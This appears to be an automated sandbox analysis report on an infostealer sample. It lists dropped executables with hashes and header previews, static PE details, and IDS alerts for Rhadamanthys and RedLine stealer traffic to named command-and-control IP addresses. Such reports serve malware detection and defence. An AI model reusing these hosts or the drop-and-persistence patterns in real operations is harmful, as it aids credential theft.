Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\8b2774850bdc17a926dc650317d86b33\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\a3e764ed5105d4b1ca29e76f9dbbe5d7\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHje:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxU
MD5:	75BC6DB42CE4C37482926043D9B80BC9
SHA1:	700BDF1D18804FBE60EB0318B290C37CDC60EA41
SHA-256:	15F15BDEB42AD40DBCB6BB9064C33B51CB43EDB99820EDE647350BE604AAF58A
SHA-512:	26E15E546BBD6518265BAC343F952E75B30C7927143D293780F456A5B44C1E1B6B7D074DF00BC6328D23E52FE9E3F8850A879B129C35F47B0ED864E9C640BA4F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	9432
Entropy (8bit):	4.918232018284106
Encrypted:	false
SSDEEP:	192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
MD5:	F6775EDC5EE3B8EEDBF8310BD48C709D
SHA1:	51DBC51183BFBFE57F24E9AD63840E60D2E64842
SHA-256:	B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
SHA-512:	EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\226F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1642648
Entropy (8bit):	7.847643854402106
Encrypted:	false
SSDEEP:	49152:murDawItlpDZLPU/kHWGPaYE3Ku7ZKZ6nxvax85fCSuw:muPawItlpDZDU/kZPaYm/JvaxQCK
MD5:	EA25CE2F3580AF1DD771BAC5B0D2BF83
SHA1:	8A425695AE3154F222BA4A7A8AF03287D20F8BC4
SHA-256:	768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534
SHA-512:	70776BD050666D7ABCDB0668832A652FC4A67E45243DFD229520DA3712B85B506FFE9C3ED3C3C1E89F388C2D56B6E3FC8CDC31B35485FF1BA456F8A47277F0C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43% Antivirus: Virustotal, Detection: 39%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G.b...b...b...0>..b...0/..b...09..b.......b...b...b...00..b...0...b...b-..b...0+..b..Rich.b..........................PE..L....~.c......................#.....k.............@...........................9.....2[....@.....................................P.....6.0.....................9.........................................@...............`............................text...6........................... ..`.rdata...0.......2..................@..@.data...<. .........................@....rsrc...0.....6.....................@..@.reloc...I....9..J..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2560.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	718848
Entropy (8bit):	7.8663391957867645
Encrypted:	false
SSDEEP:	12288:XQc1wGGrXn8rDAG7ps+O6TuFlgflEKK9LcFXTASviKWBNbaPSFS:XTwGGrsASprtEKK9wF0SrWBQKFS
MD5:	0A006808F7AA017CAF2DF9CE9E2B55A2
SHA1:	63F5B0E9FE5E3DAEBDBFC8AA168AB163E436AC32
SHA-256:	F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05
SHA-512:	8AD4C111BF0904EB739A462E274C7A2FD9EC1AFB2DB7D77F176B26438520C4859B2CCB46A4C76F206E20B4584E434E1D78B26DCD042F08B3D573BB99036E8C73
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..Y.pl..pl..pl.."...pl.."..rpl.(....pl..pm..pl.."..,pl.."...pl.."...pl.Rich.pl.................PE..L......a.....................Z......6x............@.........................................................................,...d....p..P,..........................P................................Z..@............................................text.............................. ..`.data............4..................@....rsrc...P,...p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\336E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	417792
Entropy (8bit):	7.008431460440525
Encrypted:	false
SSDEEP:	6144:GILot0e73kNAn1SNCe64axZb30GvtQK/fu1d04DI12mTb:GIct0eLkPNL64Y91tQKXu1PDI12
MD5:	261B1DB94CCF4266128E2EB71A80FDA4
SHA1:	9D4CD03297F31EABE957F261DC7C3C6C268BD39F
SHA-256:	B0072463E78182E8D9721F91F889A62D9CE59A348FDDC5196B6201A5FA68B259
SHA-512:	2DD25970561CF9E3D946ACD891B601E6AA7E6563DDE6C10ED5AC1A6486BBC1851CF3908B5BDEE6C9B29633E51C90339209C50D97C0EA28B897BD6E7117B1AC7B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5898187.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\226F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	343040
Entropy (8bit):	7.533406928573143
Encrypted:	false
SSDEEP:	6144:324+ZV6NuvwV+hq3kd2UaXYnKUFWBMljuhLaWdTPk8SarppXad:YuNuvwUhq3kd2USYKUQ6ljkLaWdTPk8q
MD5:	F56B1B3FE0C50C6ED0FAD54627DF7A9A
SHA1:	05742C9AD28475C7AFDD3D6A63DD9200FC0B9F72
SHA-256:	E8F71DA41BBC272EF84589A7575B13B8B5D6D5D01796B3AF033682657263C53B
SHA-512:	FDE2089BCDF19CDB9D27763E4D3294A0E42CD0A3132463636610D85C3903B885BE6142D3B42204E89B76B5595E8B132580C8A5C60CED96D042AD96BCFE29B1C9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...r..c...........!.........\|............................................................@.............................s.......<............................`......................................................d...$............................text.............................. ..`.rdata...[.......\..................@..@.data...x....0......................@....00cfg.......P.......&..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Library.exe

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3162624
Entropy (8bit):	7.989170144844482
Encrypted:	false
SSDEEP:	49152:Bc60tZPCW+7npLN+LGgXP1idPDhwcsuuKQLlv02EmYakkriZ7czTnItexztCNxR4:BaV+tLN+qg/8rhUuunlm9kg4TniizEv
MD5:	EC5A11FC9A9CB3111AFA460FEC201D3D
SHA1:	5E2665BBDAD06FC5423FB9E6C819AE4CB9982DE1
SHA-256:	F553B5D26D797F332B036D42B43793622CED3EA336FD2EFDA337D39679E9B824
SHA-512:	6F8EC56125F20D1D444B4DD5438FB73FF6A268FB0D4B97C1D03960BECC3E4FED8BA95C85B4BD7B7B4A27E165E0CBD81B4D05D79FC0CF7B31A6BA404150132A94
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....R.c.........."...0..:0.............. .....@..... ........................0...........@..........................................................`0.............................................................................................. ..H............text...L90.. ...:0................. ..`.rsrc........`0......<0.............@..@........................................H........./.x...........HD...............................................0..........(:...(g........0.......... ..[....(4...&..(......0.......... >.[....(4...&..0.......... \.[....(4...t......0..,....... s.[.(....o.....(....o....(......(4...t.....0.......... ..[....(4...t......0.......... ..[....(4...&..0................%.... 2.[....(4...........0.......... Y.[....(4...t......0................%.... ..[....(4...t.......0............{.....{.....o.....+..*R.(.......s....}....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jbitbac.qx5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfuf4nv3.1n4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\336E.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	752246784
Entropy (8bit):	7.999823889690503
Encrypted:	true
SSDEEP:
MD5:	A4C9D357EA9C7679D978EB985F61E6C5
SHA1:	F5CD28E15AE9AA3F95C7DC8DF9CD0E09B6E9B650
SHA-256:	4FA6D1456D893E3653BA35F77FDD94099DD20986DABB657BE14E7455BB70910A
SHA-512:	20E511E8D928748C1DBA8C605483A2D98F46E5F7C8FFD07A21613AF01D00AA20087038B65002C179DF69B202FC4A62764A3B2AC61C3F8988DD913B448E275EB0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\dbjigst

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	199680
Entropy (8bit):	7.104315914125058
Encrypted:	false
SSDEEP:	3072:OBN4X3HL6thikLX8OKWnG5/9sSR3STCDrKQqSrwizN5UE3Z9ziBG7aZ:imG7LX9pno9sSxOCDlrwiz75p9oG7w
MD5:	B5C3C3D5EB5E6B5415AC4D87E3C46850
SHA1:	9AA4014DE1B622844DDFA4C7DDB17AE384289CD2
SHA-256:	B7948C22484BDDCE96A2713DA0A6BDA18CFD0487DB9239ED0FD1790552D5E6B2
SHA-512:	C573290AA51321D892BE106F42CE6728B20E6AF4EC4DF4F5020DB364DD7103F89C62CE67C19EB50767707FB0DD30B977CE1DA2E9EB53D6799CE08501A68C6B65
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 85%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.FUD.FUD.FUD.X..[UD.X..8UD.a.?.MUD.FUE..UD.X...bUD.X..GUD.X..GUD.RichFUD.........PE..L......a.....................hx......~............@...........................y................................................x.....y.x..........................P................................Z..@............................................text............................... ..`.data.....w......D..................@....rsrc...x*....y..,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\dbjigst:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll

Download File

Process:	C:\Windows\SysWOW64\fontview.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	58880
Entropy (8bit):	5.816689146123608
Encrypted:	false
SSDEEP:	768:G8UC0v3QaNfPhY1M/staXbOgt/pqFjkWKihkWuxvDI5syov9L7YYy/BbEl:Ts3N39/B/pqFjdFhkzqk9LMDM
MD5:	713062DABA2534394662294035FD7E92
SHA1:	40270752DB5576F1D5E6C935F224754C7B6C3450
SHA-256:	E6A5CA65ACFD261D56F622F891BF04E6D41862AB505466374DAEEE8852A01B71
SHA-512:	E07D9C38D43334CB8E35B32C12EEF9FF1DDB7FFE0004AE0D56FE3FB24FBEC6B179B631F61AFC54B1D31AD02C619442C783A9D881CCE86BE833B39C59F236B2FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u.Z....u...t..u.......u......u.......u.......u.......u.Rich..u.................PE..d....-.c.........." .........t...............................................0..........................................................L.......(............................ ..........................................................x............................text............................... ..`.rdata..<........0..................@..@.data...X5..........................@....pdata..............................@..@.reloc..j.... ......................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.104315914125058
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aw9Ynwqd1x.exe
File size:	199680
MD5:	b5c3c3d5eb5e6b5415ac4d87e3c46850
SHA1:	9aa4014de1b622844ddfa4c7ddb17ae384289cd2
SHA256:	b7948c22484bddce96a2713da0a6bda18cfd0487db9239ed0fd1790552d5e6b2
SHA512:	c573290aa51321d892be106f42ce6728b20e6af4ec4df4f5020db364dd7103f89c62ce67c19eb50767707fb0dd30b977ce1da2e9eb53d6799ce08501a68c6b65
SSDEEP:	3072:OBN4X3HL6thikLX8OKWnG5/9sSR3STCDrKQqSrwizN5UE3Z9ziBG7aZ:imG7LX9pno9sSxOCDlrwiz75p9oG7w
TLSH:	0B14D03276B3C0B3C55A04711824DBD53E7BB53046B5884B7BA80ABD5E707E1A76B38E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4*.FUD.FUD.FUD.X...[UD.X...8UD.a.?.MUD.FUE..UD.X...bUD.X...GUD.X...GUD.RichFUD.........PE..L......a.....................hx....

File Icon


Icon Hash:	d0b0b892e8e4c0c4

Static PE Info

General

Entrypoint:	0x407ed4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x61CACEB1 [Tue Dec 28 08:45:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a73658074f4769fd7f1d57304e5f6853

Entrypoint Preview

Instruction
call 00007F28F0D81D7Bh
jmp 00007F28F0D79B0Eh
int3
int3
mov edx, dword ptr [esp+0Ch]
mov ecx, dword ptr [esp+04h]
test edx, edx
je 00007F28F0D79CFBh
xor eax, eax
mov al, byte ptr [esp+08h]
test al, al
jne 00007F28F0D79CA8h
cmp edx, 00000100h
jc 00007F28F0D79CA0h
cmp dword ptr [02B97608h], 00000000h
je 00007F28F0D79C97h
jmp 00007F28F0D81E35h
push edi
mov edi, ecx
cmp edx, 04h
jc 00007F28F0D79CC3h
neg ecx
and ecx, 03h
je 00007F28F0D79C9Eh
sub edx, ecx
mov byte ptr [edi], al
add edi, 01h
sub ecx, 01h
jne 00007F28F0D79C88h
mov ecx, eax
shl eax, 08h
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 03h
shr ecx, 02h
je 00007F28F0D79C98h
rep stosd
test edx, edx
je 00007F28F0D79C9Ch
mov byte ptr [edi], al
add edi, 01h
sub edx, 01h
jne 00007F28F0D79C88h
mov eax, dword ptr [esp+08h]
pop edi
ret
mov eax, dword ptr [esp+04h]
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F28F0D79C9Ah
cmp edi, eax
jc 00007F28F0D79E3Ah
cmp ecx, 00000100h
jc 00007F28F0D79CB1h
cmp dword ptr [02B97608h], 00000000h
je 00007F28F0D79CA8h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19b1c	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2798000	0x2a78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1250	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a80	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x204	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19704	0x19800	False	0.5641084558823529	data	6.548052818508281	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x277c610	0x14400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2798000	0x2a78	0x2c00	False	0.45561079545454547	data	4.150069416811535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2798220	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Mexico
RT_ICON	0x27988e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Mexico
RT_ICON	0x2798e50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Mexico
RT_ICON	0x2799ef8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Mexico
RT_STRING	0x279a4f0	0xc0	data	Spanish	Mexico
RT_STRING	0x279a5b0	0x228	data	Spanish	Mexico
RT_STRING	0x279a7d8	0x29e	data	Spanish	Mexico
RT_GROUP_ICON	0x279a360	0x3e	data	Spanish	Mexico
RT_VERSION	0x279a3a0	0x150	data

Imports

DLL	Import
KERNEL32.dll	FindActCtxSectionStringW, CreateFileA, GetSystemWindowsDirectoryW, GlobalHandle, FindFirstVolumeMountPointW, CreateDirectoryExW, ReleaseActCtx, GetLogicalDriveStringsW, ReadConsoleInputA, GetComputerNameExW, GetTempPathA, GetCurrentDirectoryW, DebugBreak, LCMapStringW, GetProcAddress, GlobalAlloc, SetVolumeMountPointW, GetLastError, LoadLibraryW, SetCommMask, LocalUnlock, GetUserDefaultLangID, TerminateProcess, LocalFlags, GetModuleHandleA, GetConsoleAliasesLengthW, RegisterWaitForSingleObject, GlobalSize, OpenFileMappingW, lstrcmpW, ChangeTimerQueueTimer, SetConsoleScreenBufferSize, GetComputerNameW, lstrcpynW, SetConsoleCtrlHandler, CopyFileW, DosDateTimeToFileTime, QueryDosDeviceA, CreateActCtxW, DeleteVolumeMountPointW, MoveFileWithProgressA, PulseEvent, LocalReAlloc, WriteConsoleInputW, GetTempPathW, InterlockedCompareExchange, EnumTimeFormatsA, VerifyVersionInfoA, FindNextFileW, GetConsoleAliasA, FreeLibraryAndExitThread, GetNumberOfConsoleInputEvents, GetVolumePathNameA, LoadLibraryA, CloseHandle, HeapSize, ReadFile, WriteConsoleW, WideCharToMultiByte, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetStartupInfoW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, RaiseException, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll	GetCaretBlinkTime
GDI32.dll	GetBrushOrgEx, GetBoundsRect
SHELL32.dll	FindExecutableA
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Mexico

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
109.206.243.168192.168.2.380497352853001 01/25/23-09:43:38.668137	TCP	2853001	ETPRO TROJAN Rhadamanthys Stealer - Payload Response	80	49735	109.206.243.168	192.168.2.3
192.168.2.3109.206.243.16849736802853002 01/25/23-09:44:09.970426	TCP	2853002	ETPRO TROJAN Rhadamanthys Stealer - Data Exfil	49736	80	192.168.2.3	109.206.243.168
192.168.2.3109.206.243.16849760802853002 01/25/23-09:44:49.715501	TCP	2853002	ETPRO TROJAN Rhadamanthys Stealer - Data Exfil	49760	80	192.168.2.3	109.206.243.168
192.168.2.389.208.103.8849733375382043231 01/25/23-09:43:35.518560	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49733	37538	192.168.2.3	89.208.103.88
192.168.2.3109.206.243.16849735802043202 01/25/23-09:43:38.621799	TCP	2043202	ET TROJAN Rhadamanthys Stealer - Payload Download Request	49735	80	192.168.2.3	109.206.243.168
192.168.2.389.208.103.8849733375382043233 01/25/23-09:43:14.099188	TCP	2043233	ET TROJAN RedLine Stealer TCP CnC net.tcp Init	49733	37538	192.168.2.3	89.208.103.88
89.208.103.88192.168.2.337538497332043234 01/25/23-09:43:16.162357	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	37538	49733	89.208.103.88	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:42:40.452477932 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.469746113 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.470160007 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.470671892 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.470772028 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.487663984 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.487689018 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.614130974 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.614201069 CET	80	49728	188.114.97.3	192.168.2.3
